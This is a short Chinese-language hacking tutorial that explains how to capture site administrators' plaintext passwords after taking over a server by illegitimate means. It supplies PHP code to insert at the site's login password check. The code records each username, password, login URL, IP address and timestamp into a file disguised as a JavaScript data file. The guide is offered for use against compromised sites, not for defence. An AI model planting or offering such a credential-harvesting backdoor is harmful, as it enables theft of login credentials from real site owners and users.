当我们利用非正常方法拿下一台服务器或者一台服务器里的站时,这时也许不是我们最终的目的,为了得到管理员明文密码但又在md5困住了,于是我们可以运用这个方法截获管理员密码
在我们需要截获的网站后台加入:
加在网站正常程序对用户密码进行判断的位置
$ip=$_SERVER['REMOTE_ADDR']; //获取ip
$showtime=date("Y-m-d H:i:s"); //获取日期
$cururl=GetCurUrl();(自己写获取登入路径的函数) //获取登入页面
$record="Username:".$userid." Password:".$pwd." Url:".$cururl." IP:".$ip." Time:".$showtime." \r\n";// 组成成字符串集 里面变量自己更改
$handle=fopen('../include/data/ipdata.js','a+'); fopen以读写创建打开文件
$write=fwrite($handle,$record); //fwrite函数把刚才的字符串写进文件保存
function getCurUrl() {
if (! empty ( $_SERVER [\"REQUEST_URI\"] )) {
$scriptName = $_SERVER [\"REQUEST_URI\"];
$nowurl = $scriptName;
} else {
$scriptName = $_SERVER [\"PHP_SELF\"];
if (empty ( $_SERVER [\"QUERY_STRING\"] )) {
$nowurl = $scriptName;
} else {
$nowurl = $scriptName . \"?\" . $_SERVER [\"QUERY_STRING\"];
}
}
return $nowurl;
} 自定义获取当前脚本所在url